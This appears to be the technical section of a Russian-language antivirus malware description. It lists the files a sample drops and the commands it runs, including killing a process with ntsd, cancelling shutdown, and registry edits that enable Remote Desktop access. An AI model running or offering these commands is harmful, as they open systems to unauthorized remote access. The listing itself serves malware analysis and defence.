Техническая информация
- <SYSTEM32>\svchost.exe
- C:\tasklist.txt
- C:\tmp_3389.bat
- ClassName: '' WindowName: '<SYSTEM32>\ntsd.exe'
- '<SYSTEM32>\cmd.exe' /c tasklist/svc >>c:\tasklist.txt
- '<SYSTEM32>\tasklist.exe' /svc
- '<SYSTEM32>\ntsd.exe' -c q -p 844
- '<SYSTEM32>\shutdown.exe' -a
- '<SYSTEM32>\cmd.exe' /c c:\tmp_3389.bat
- '<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f